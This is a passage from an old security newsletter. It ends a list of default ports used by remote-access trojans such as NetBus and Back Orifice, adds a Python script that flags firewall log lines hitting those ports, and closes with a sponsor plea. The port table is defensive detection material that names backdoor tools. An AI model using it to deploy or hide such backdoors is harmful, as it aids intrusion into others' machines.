port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil
You'll find the list on the following address: http://www.simovits.com/nyheter9902.html
(still in Swedish but it will be translated in the near future).
To help anyone to detect trojan attacks, I'm planning to add information about the
original names of the executables, their size, where they usually are hiding, and the
names of any helpfiles they may use. I will also add tools or links to tools that may be
of your assistance.
Feel free to get back to me with any comments or suggestions. If you find new trojans
I'd love to get my hands on them, but please mail me first, as I don't need more than
one copy. If you have live experience of trojan attacks I'm interested to read about
your findings.
Joakim
joakim.von.braun@risab.se
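As an added example (not from Joakim's post), here is the list above applied as a lookup over firewall log lines. The port table is a subset of the list; the log line format and the lines themselves are constructed; and hits on ports that also carry ordinary services (21, 23, 25, 80) are marked low confidence because, as the post says, the port alone proves little.

```python
import re
from collections import defaultdict

# Subset of the default-port table above: port -> trojans using it.
TROJAN_PORTS = {
    21: ["Blade Runner", "Doly Trojan", "Fore", "Invisible FTP", "WebEx", "WinCrash"],
    23: ["Tiny Telnet Server"],
    80: ["Executor"],
    1999: ["BackDoor"],
    5400: ["Blade Runner"],
    6670: ["DeepThroat"],
    12345: ["GabanBus", "NetBus"],
    12346: ["GabanBus", "NetBus"],
    20034: ["NetBus 2 Pro"],
    31337: ["Back Orifice"],
    31338: ["Back Orifice", "DeepBO"],
}

# Ports that also carry ordinary services, so a hit there is weak evidence.
COMMON_SERVICE_PORTS = {21, 23, 25, 80}

# Constructed log format: "<date> <time> <src>:<sport> -> <dst>:<dport> <proto>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<proto>TCP|UDP)$"
)


def parse_line(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def match_trojan_ports(lines, table=TROJAN_PORTS):
    """Annotate each parsable line whose destination port is in the table."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["dport"] not in table:
            continue
        rec["names"] = table[rec["dport"]]
        rec["confidence"] = "low" if rec["dport"] in COMMON_SERVICE_PORTS else "medium"
        hits.append(rec)
    return hits


def summarize_by_source(hits):
    """Group hit ports by source address: one host touching several trojan
    ports looks like a scan, while a single packet may just be noise."""
    summary = defaultdict(set)
    for h in hits:
        summary[h["src"]].add(h["dport"])
    return {src: sorted(ports) for src, ports in summary.items()}


# Constructed sample log lines.
SAMPLE_LOG = [
    "1999-05-16 02:11:07 10.0.0.5:1054 -> 192.0.2.10:12345 TCP",
    "1999-05-16 02:11:09 10.0.0.5:1055 -> 192.0.2.10:31337 UDP",
    "1999-05-16 02:12:30 10.0.0.9:4021 -> 192.0.2.10:80 TCP",
    "1999-05-16 02:13:01 10.0.0.7:1234 -> 192.0.2.10:443 TCP",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for h in match_trojan_ports(SAMPLE_LOG):
        print(h["ts"], h["src"], "->", h["dport"], h["names"], h["confidence"])
    print(summarize_by_source(match_trojan_ports(SAMPLE_LOG)))
```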
------------------------------
Please visit:
http://www.thepoison.org/popup.html and click on our sponsor(s) please!
Please go there and just take 2 seconds to click there because we have to pay the bills
somehow.
[ASCII-art banner]
Antidote is an HNN Affiliate
http://www.hackernews.com
All ASCII art is done by Lord Oak and permission is needed from him before using.